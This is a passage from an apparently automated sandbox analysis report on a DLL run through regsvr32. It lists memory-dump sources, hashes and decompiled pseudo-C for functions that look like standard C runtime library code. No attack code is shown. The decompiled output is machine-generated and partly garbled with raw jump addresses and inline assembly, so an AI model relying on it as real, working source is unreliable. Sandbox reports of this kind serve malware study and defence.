                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: NameName::
                                                                                                              • String ID: `template-parameter$void
                                                                                                              • API String ID: 1333004437-4057429177
                                                                                                              • Opcode ID: 9ee28ed97abbba7733d8bbc292c21813d4d4c456bed7cbd316de1a2b54edbc8b
                                                                                                              • Instruction ID: 29c290ce2aa814a05071f4664f227510971c123a34874c342b421052006a8231
                                                                                                              • Opcode Fuzzy Hash: 9ee28ed97abbba7733d8bbc292c21813d4d4c456bed7cbd316de1a2b54edbc8b
                                                                                                              • Instruction Fuzzy Hash: 48414A32700B5888FB82DBA4D8513ED33B1B74CBD8F948115EE4967B99DF788649C341
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018000F458 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Library$Load$ErrorFreeLast
                                                                                                              • String ID: api-ms-
                                                                                                              • API String ID: 3813093105-2084034818
                                                                                                              • Opcode ID: e35dbd52aba7f64ad23ed207506ff470d1c61cb34e1a32a3bc4f3eeaefbbbb37
                                                                                                              • Instruction ID: 03c70b89eb85fde413d8faf1e06ee20dffbdbd482f4c0d73f085749b8cf3ebb1
                                                                                                              • Opcode Fuzzy Hash: e35dbd52aba7f64ad23ed207506ff470d1c61cb34e1a32a3bc4f3eeaefbbbb37
                                                                                                              • Instruction Fuzzy Hash: D5217431302E0891EEA6CB16A8003E97294BB4DBF1F598735BE3947BD0DF38D6899300
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018003A304 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                              • Opcode ID: 54853be1bc51f33c9405f6d2a71f046a7c5a485fd14febfd79b95464ce2b89c5
                                                                                                              • Instruction ID: 29b829011da5b5d2a580de61c5334f76f122d12e6b455fdd3bcd0909512b23b8
                                                                                                              • Opcode Fuzzy Hash: 54853be1bc51f33c9405f6d2a71f046a7c5a485fd14febfd79b95464ce2b89c5
                                                                                                              • Instruction Fuzzy Hash: 79F06271205A0C91FBA28B24E8443AA6320FB8E7E1F548316F56A566F4CF2DC34DC300
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018005A27C Relevance: 7.7, APIs: 5, Instructions: 196COMMON
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 37%
                                                                                                              			E0000000118005A27C(signed int __ecx, long long __rbx, signed int __rcx, void* __rdx, signed int __r8, signed int _a8, long long _a16, signed int _a32) {
				signed short _v90;
				unsigned int _v92;
				signed int _v96;
				signed int _v100;
				char _v104;
				void* _t41;
				void* _t42;
				void* _t43;
				void* _t44;
				signed short _t45;
				unsigned int _t49;
				unsigned int _t50;
				void* _t52;
				void* _t53;
				signed int _t57;
				signed int _t63;
				signed int _t64;
				void* _t72;
				unsigned int _t73;
				signed int _t82;
				signed int _t83;
				void* _t86;
				signed int _t87;
				void* _t88;
				void* _t89;
				signed int _t91;
				void* _t92;
				signed int _t103;
				signed long long _t107;
				void* _t117;
				void* _t118;
				void* _t125;

				_t123 = __r8;
				_a16 = __rbx;
				asm("movaps [esp+0x40], xmm6");
				asm("movaps [esp+0x30], xmm7");
				_t57 = __ecx & 0x0000001f;
				_v100 = _t57;
				_t3 = _t117 + 0x10; // 0x10
				r15d = _t3;
				r12d = __ecx;
				if ((__ecx & 0x00000008) == 0) goto 0x8005a2cc;
				if (r13b >= 0) goto 0x8005a2cc;
				_t42 = E0000000118005AA7C(_t41, _t57, __rcx);
				_t58 = _t57 & 0xfffffff7;
				goto 0x8005a52e;
				_t82 = 0x00000004 & r12b;
				if (_t82 == 0) goto 0x8005a2ea;
				asm("dec ecx");
				if (_t82 >= 0) goto 0x8005a2ea;
				_t43 = E0000000118005AA7C(_t42, _t57 & 0xfffffff7, __rcx);
				goto 0x8005a52e;
				_t83 = sil & r12b;
				if (_t83 == 0) goto 0x8005a3ad;
				asm("dec ecx");
				if (_t83 >= 0) goto 0x8005a3ad;
				_t44 = E0000000118005AA7C(_t43, _t58 & 0xfffffffb, __rcx);
				_t107 = __r8 & __rcx;
				if (_t83 == 0) goto 0x8005a378;
				if (_t107 == 0x2000) goto 0x8005a35f;
				if (_t107 == 0x4000) goto 0x8005a346;
				_t86 = _t107 - __rcx;
				if (_t86 != 0) goto 0x8005a3a5;
				asm("movsd xmm0, [ebp]");
				asm("comisd xmm0, [0xe416]");
				asm("movsd xmm0, [0xe43e]");
				if (_t86 > 0) goto 0x8005a3a0;
				goto 0x8005a399;
				asm("movsd xmm0, [ebp]");
				asm("comisd xmm0, [0xe3fd]");
				if (_t86 > 0) goto 0x8005a387;
				asm("movsd xmm0, [0xe423]");
				goto 0x8005a399;
				asm("movsd xmm0, [ebp]");
				asm("comisd xmm0, [0xe3e4]");
				if (_t86 <= 0) goto 0x8005a391;
				asm("movsd xmm0, [0xe40a]");
				goto 0x8005a3a0;
				asm("movsd xmm0, [ebp]");
				asm("comisd xmm0, [0xe3cb]");
				if (_t86 <= 0) goto 0x8005a391;
				asm("movsd xmm0, [0xe3e1]");
				goto 0x8005a3a0;
				asm("movsd xmm0, [0xe3d7]");
				asm("xorps xmm0, [0xe3c0]");
				asm("movsd [ebp], xmm0");
				goto 0x8005a52e;
				_t87 = r12b & 0x00000002;
				if (_t87 == 0) goto 0x8005a52e;
				asm("dec ecx");
				if (_t87 >= 0) goto 0x8005a52e;
				asm("movsd xmm0, [edx]");
				r14d = r12d;
				r14d = r14d >> 4;
				asm("xorps xmm7, xmm7");
				r14d = r14d & 0x00000001;
				asm("ucomisd xmm0, xmm7");
				if (_t87 != 0) goto 0x8005a3df;
				if (_t87 == 0) goto 0x8005a523;
				_t45 = E0000000118005AB9C(_t44, _t87,  &_v104);
				_t72 = _v104 + 0xfffffa00;
				asm("movsd [esp+0x28], xmm0");
				_t88 = _t72 - 0xfffffbce;
				if (_t88 >= 0) goto 0x8005a410;
				asm("mulsd xmm0, xmm7");
				r14d = 1;
				asm("movaps xmm6, xmm0");
				goto 0x8005a519;
				r9d = 0;
				asm("comisd xmm7, xmm0");
				r8b = dil;
				_a8 = dil;
				r9b = _t88 > 0;
				_v90 = _t45 & 0x0000000f | r15w;
				_a32 = dil;
				_t89 = _t72 - 0xfffffc03;
				if (_t89 >= 0) goto 0x8005a4a5;
				_t49 = _v96;
				_t73 = _v92;
				_a32 = _t49 & 0x00000001;
				if (_t89 == 0) goto 0x8005a474;
				r8b = sil;
				r14d =  ==  ? 1 : r14d;
				_t50 = _t49 >> 1;
				_v96 = _t50;
				_t91 = sil & _t73;
				if (_t91 == 0) goto 0x8005a487;
				asm("bts eax, 0x1f");
				_v96 = _t50;
				if (_t91 != 0) goto 0x8005a45d;
				_t63 = _v100;
				_v92 = _t73 >> 1;
				_a8 = r8b;
				asm("movsd xmm6, [esp+0x28]");
				_t92 = r9d;
				if (_t92 == 0) goto 0x8005a4bd;
				asm("xorps xmm6, [0xe2a9]");
				asm("movsd [esp+0x28], xmm6");
				asm("comisd xmm7, xmm0");
				r15b = _t92 > 0;
				if (_a32 != 0) goto 0x8005a4ce;
				if (r8b == 0) goto 0x8005a513;
				_t52 = E0000000118005060C(_v96 >> 0x30, __rcx, _t123);
				if (_t52 == 0) goto 0x8005a4ed;
				if (_t52 == 0x100) goto 0x8005a4e8;
				if (_t52 != 0x200) goto 0x8005a513;
				r15b = r15b ^ sil;
				goto 0x8005a506;
				if (_a32 == dil) goto 0x8005a513;
				if (_a8 != dil) goto 0x8005a508;
				if ((_v96 & sil) == 0) goto 0x8005a513;
				_v96 = _v96 + _t118;
				asm("movsd xmm6, [esp+0x28]");
				r15d = 0x10;
				asm("movsd [ebp], xmm6");
				if (r14d == 0) goto 0x8005a52b;
				_t53 = E0000000118005AA7C(_t52, _t63, _t125);
				_t64 = _t63 & 0xfffffffd;
				_t103 = r15b & r12b;
				if (_t103 == 0) goto 0x8005a547;
				asm("dec ecx");
				if (_t103 >= 0) goto 0x8005a547;
				E0000000118005AA7C(_t53, _t64, _t125);
				asm("movaps xmm6, [esp+0x40]");
				asm("movaps xmm7, [esp+0x30]");
				dil = (_t64 & 0xffffffef) == 0;
				return 0;
			}



































                                                                                                              0x18005a27c
                                                                                                              0x18005a27c
                                                                                                              0x18005a292
                                                                                                              0x18005a299
                                                                                                              0x18005a29e
                                                                                                              0x18005a2a4
                                                                                                              0x18005a2ab
                                                                                                              0x18005a2ab
                                                                                                              0x18005a2af
                                                                                                              0x18005a2b5
                                                                                                              0x18005a2ba
                                                                                                              0x18005a2bf
                                                                                                              0x18005a2c4
                                                                                                              0x18005a2c7
                                                                                                              0x18005a2d1
                                                                                                              0x18005a2d4
                                                                                                              0x18005a2d6
                                                                                                              0x18005a2db
                                                                                                              0x18005a2dd
                                                                                                              0x18005a2e5
                                                                                                              0x18005a2ef
                                                                                                              0x18005a2f2
                                                                                                              0x18005a2f8
                                                                                                              0x18005a2fd
                                                                                                              0x18005a306
                                                                                                              0x18005a313
                                                                                                              0x18005a316
                                                                                                              0x18005a31e
                                                                                                              0x18005a326
                                                                                                              0x18005a328
                                                                                                              0x18005a32b
                                                                                                              0x18005a32d
                                                                                                              0x18005a332
                                                                                                              0x18005a33a
                                                                                                              0x18005a342
                                                                                                              0x18005a344
                                                                                                              0x18005a346
                                                                                                              0x18005a34b
                                                                                                              0x18005a353
                                                                                                              0x18005a355
                                                                                                              0x18005a35d
                                                                                                              0x18005a35f
                                                                                                              0x18005a364
                                                                                                              0x18005a36c
                                                                                                              0x18005a36e
                                                                                                              0x18005a376
                                                                                                              0x18005a378
                                                                                                              0x18005a37d
                                                                                                              0x18005a385
                                                                                                              0x18005a387
                                                                                                              0x18005a38f
                                                                                                              0x18005a391
                                                                                                              0x18005a399
                                                                                                              0x18005a3a0
                                                                                                              0x18005a3a8
                                                                                                              0x18005a3ad
                                                                                                              0x18005a3b1
                                                                                                              0x18005a3b7
                                                                                                              0x18005a3bc
                                                                                                              0x18005a3c2
                                                                                                              0x18005a3c6
                                                                                                              0x18005a3c9
                                                                                                              0x18005a3cd
                                                                                                              0x18005a3d0
                                                                                                              0x18005a3d3
                                                                                                              0x18005a3d7
                                                                                                              0x18005a3d9
                                                                                                              0x18005a3e4
                                                                                                              0x18005a3ed
                                                                                                              0x18005a3f3
                                                                                                              0x18005a3f9
                                                                                                              0x18005a3ff
                                                                                                              0x18005a401
                                                                                                              0x18005a405
                                                                                                              0x18005a408
                                                                                                              0x18005a40b
                                                                                                              0x18005a415
                                                                                                              0x18005a418
                                                                                                              0x18005a41c
                                                                                                              0x18005a41f
                                                                                                              0x18005a427
                                                                                                              0x18005a437
                                                                                                              0x18005a43f
                                                                                                              0x18005a446
                                                                                                              0x18005a44c
                                                                                                              0x18005a44e
                                                                                                              0x18005a459
                                                                                                              0x18005a461
                                                                                                              0x18005a468
                                                                                                              0x18005a46d
                                                                                                              0x18005a470
                                                                                                              0x18005a474
                                                                                                              0x18005a476
                                                                                                              0x18005a47a
                                                                                                              0x18005a47d
                                                                                                              0x18005a47f
                                                                                                              0x18005a483
                                                                                                              0x18005a48c
                                                                                                              0x18005a48e
                                                                                                              0x18005a499
                                                                                                              0x18005a49d
                                                                                                              0x18005a4a5
                                                                                                              0x18005a4ab
                                                                                                              0x18005a4ae
                                                                                                              0x18005a4b0
                                                                                                              0x18005a4b7
                                                                                                              0x18005a4bd
                                                                                                              0x18005a4c1
                                                                                                              0x18005a4c7
                                                                                                              0x18005a4cc
                                                                                                              0x18005a4ce
                                                                                                              0x18005a4d5
                                                                                                              0x18005a4dc
                                                                                                              0x18005a4e3
                                                                                                              0x18005a4e5
                                                                                                              0x18005a4eb
                                                                                                              0x18005a4f5
                                                                                                              0x18005a4ff
                                                                                                              0x18005a506
                                                                                                              0x18005a508
                                                                                                              0x18005a50d
                                                                                                              0x18005a513
                                                                                                              0x18005a519
                                                                                                              0x18005a521
                                                                                                              0x18005a526
                                                                                                              0x18005a52b
                                                                                                              0x18005a52e
                                                                                                              0x18005a531
                                                                                                              0x18005a533
                                                                                                              0x18005a538
                                                                                                              0x18005a53f
                                                                                                              0x18005a547
                                                                                                              0x18005a556
                                                                                                              0x18005a55b
                                                                                                              0x18005a570

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _set_statfp
                                                                                                              • String ID:
                                                                                                              • API String ID: 1156100317-0
                                                                                                              • Opcode ID: 5f4058c8a8b38e8d025364b2709205e8f05f294421cb4caa9849ac64ece5ffad
                                                                                                              • Instruction ID: a3a69338805eca6ecf0623057e30d9ca7c5111c15212d69954bfac610068d350
                                                                                                              • Opcode Fuzzy Hash: 5f4058c8a8b38e8d025364b2709205e8f05f294421cb4caa9849ac64ece5ffad
                                                                                                              • Instruction Fuzzy Hash: F3819132508A4C89F7F38E35A4503EA6760FB5E3D8F14C315BA9A36595EF36C7898B00
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 00000001800090E8 Relevance: 7.6, APIs: 5, Instructions: 94COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: NameName::$Name::operator+
                                                                                                              • String ID:
                                                                                                              • API String ID: 826178784-0
                                                                                                              • Opcode ID: 954e50de57e7f6c52a7e7990d70177fa92607e95154cf0786634b43ede04b9b2
                                                                                                              • Instruction ID: dc6dacfc886d82a36c5bc1d572fcc0b805e2bed65cc2f5ecee994ed639fe826c
                                                                                                              • Opcode Fuzzy Hash: 954e50de57e7f6c52a7e7990d70177fa92607e95154cf0786634b43ede04b9b2
                                                                                                              • Instruction Fuzzy Hash: 8C416532702B5998EB92CB61D8943E937B4F35DBC0F948012FA8913795DF38CA59C300
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0000000180058DB8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 85%
                                                                                                              			E00000001180058DB8(signed int __ecx, long long __rbx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
				void* _t19;
				void* _t20;
				void* _t21;
				void* _t22;
				void* _t23;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				signed int _t31;
				signed int _t32;
				signed int _t43;
				signed int _t44;
				signed int _t45;
				signed int _t47;
				void* _t52;

				_a8 = __rbx;
				_a16 = __rsi;
				_t28 = __ecx & 0x0000001f;
				if ((__ecx & 0x00000008) == 0) goto 0x80058dea;
				if (sil >= 0) goto 0x80058dea;
				_t20 = E0000000118005AA7C(_t19, _t28, _t52);
				_t29 = _t28 & 0xfffffff7;
				goto 0x80058e41;
				_t43 = 0x00000004 & dil;
				if (_t43 == 0) goto 0x80058e05;
				asm("dec eax");
				if (_t43 >= 0) goto 0x80058e05;
				_t21 = E0000000118005AA7C(_t20, _t29, _t52);
				_t30 = _t29 & 0xfffffffb;
				goto 0x80058e41;
				_t44 = dil & 0x00000001;
				if (_t44 == 0) goto 0x80058e21;
				asm("dec eax");
				if (_t44 >= 0) goto 0x80058e21;
				_t22 = E0000000118005AA7C(_t21, _t30, _t52);
				_t31 = _t30 & 0xfffffffe;
				goto 0x80058e41;
				_t45 = dil & 0x00000002;
				if (_t45 == 0) goto 0x80058e41;
				asm("dec eax");
				if (_t45 >= 0) goto 0x80058e41;
				if ((dil & 0x00000010) == 0) goto 0x80058e3e;
				_t23 = E0000000118005AA7C(_t22, _t31, _t52);
				_t32 = _t31 & 0xfffffffd;
				_t47 = dil & 0x00000010;
				if (_t47 == 0) goto 0x80058e5b;
				asm("dec eax");
				if (_t47 >= 0) goto 0x80058e5b;
				E0000000118005AA7C(_t23, _t32, _t52);
				return 0 | (_t32 & 0xffffffef) == 0x00000000;
			}


















                                                                                                              0x180058db8
                                                                                                              0x180058dbd
                                                                                                              0x180058dcc
                                                                                                              0x180058dd4
                                                                                                              0x180058dd9
                                                                                                              0x180058de0
                                                                                                              0x180058de5
                                                                                                              0x180058de8
                                                                                                              0x180058def
                                                                                                              0x180058df2
                                                                                                              0x180058df4
                                                                                                              0x180058df9
                                                                                                              0x180058dfb
                                                                                                              0x180058e00
                                                                                                              0x180058e03
                                                                                                              0x180058e05
                                                                                                              0x180058e09
                                                                                                              0x180058e0b
                                                                                                              0x180058e10
                                                                                                              0x180058e17
                                                                                                              0x180058e1c
                                                                                                              0x180058e1f
                                                                                                              0x180058e21
                                                                                                              0x180058e25
                                                                                                              0x180058e27
                                                                                                              0x180058e2c
                                                                                                              0x180058e32
                                                                                                              0x180058e39
                                                                                                              0x180058e3e
                                                                                                              0x180058e41
                                                                                                              0x180058e45
                                                                                                              0x180058e47
                                                                                                              0x180058e4c
                                                                                                              0x180058e53
                                                                                                              0x180058e71

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _set_statfp
                                                                                                              • String ID:
                                                                                                              • API String ID: 1156100317-0
                                                                                                              • Opcode ID: 9672a7db9e5d2074402094157004e9d745d20475ce8d6a8b0f001699c775eb19
                                                                                                              • Instruction ID: 01bc4e7c8d0c173781f541b9fa60b376af4ddb86d5f1b32e7024f46db2dc0675
                                                                                                              • Opcode Fuzzy Hash: 9672a7db9e5d2074402094157004e9d745d20475ce8d6a8b0f001699c775eb19
                                                                                                              • Instruction Fuzzy Hash: 52110A32604E0D41FAE62124E9573E91060AF5D3F4F04C624BD7A363E6CF2A4B4DA301
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018003D230 Relevance: 7.6, APIs: 5, Instructions: 54COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • FlsGetValue.KERNEL32(?,?,?,0000000180013523,?,?,00000000,0000000180013882,?,?,?,?,?,000000018001380E), ref: 000000018003D24F
                                                                                                              • FlsSetValue.KERNEL32(?,?,?,0000000180013523,?,?,00000000,0000000180013882,?,?,?,?,?,000000018001380E), ref: 000000018003D26E
                                                                                                              • FlsSetValue.KERNEL32(?,?,?,0000000180013523,?,?,00000000,0000000180013882,?,?,?,?,?,000000018001380E), ref: 000000018003D296
                                                                                                              • FlsSetValue.KERNEL32(?,?,?,0000000180013523,?,?,00000000,0000000180013882,?,?,?,?,?,000000018001380E), ref: 000000018003D2A7
                                                                                                              • FlsSetValue.KERNEL32(?,?,?,0000000180013523,?,?,00000000,0000000180013882,?,?,?,?,?,000000018001380E), ref: 000000018003D2B8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Value
                                                                                                              • String ID:
                                                                                                              • API String ID: 3702945584-0
                                                                                                              • Opcode ID: 1b88299e96af691b6db6411e19ae04952ecc5c11556246a97cd16452aea85548
                                                                                                              • Instruction ID: 02f15b5cbb9cf141e189c0bcaa582931cf1889448a77bf2393b37eb9c57266c0
                                                                                                              • Opcode Fuzzy Hash: 1b88299e96af691b6db6411e19ae04952ecc5c11556246a97cd16452aea85548
                                                                                                              • Instruction Fuzzy Hash: 6711603070474C41FAEBA325A5913FB23526B9C3F4F56C326B879467D7DE28C64A8300
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018003CD80 Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Value
                                                                                                              • String ID:
                                                                                                              • API String ID: 3702945584-0
                                                                                                              • Opcode ID: 912b17cfdb036672fb25a0515c9b335ac647c9678857b52d54781a4a8650978c
                                                                                                              • Instruction ID: 707b21bfd7368a437bdbefb57e6ab63407ad2205a3ac835a8d2c6df98ad4671b
                                                                                                              • Opcode Fuzzy Hash: 912b17cfdb036672fb25a0515c9b335ac647c9678857b52d54781a4a8650978c
                                                                                                              • Instruction Fuzzy Hash: 4811543030060841F9EBA33555517FB17816B8C3F4F1AC735B93A863C7DD2886494301
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018003D0C4 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Value
                                                                                                              • String ID:
                                                                                                              • API String ID: 3702945584-0
                                                                                                              • Opcode ID: 9cf78734415ad5f28745d1543aca8f60120bff2395824cd3e85abb58f315948b
                                                                                                              • Instruction ID: 47b839bd1d797c5d88daa617e69d1427dc664eaeb7e219eae484c38241f36458
                                                                                                              • Opcode Fuzzy Hash: 9cf78734415ad5f28745d1543aca8f60120bff2395824cd3e85abb58f315948b
                                                                                                              • Instruction Fuzzy Hash: EC111E3030060C46F9EFA33568527FB13416B8D7F4E56C726B93A4A3C3DE2996598301
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018003CCE0 Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
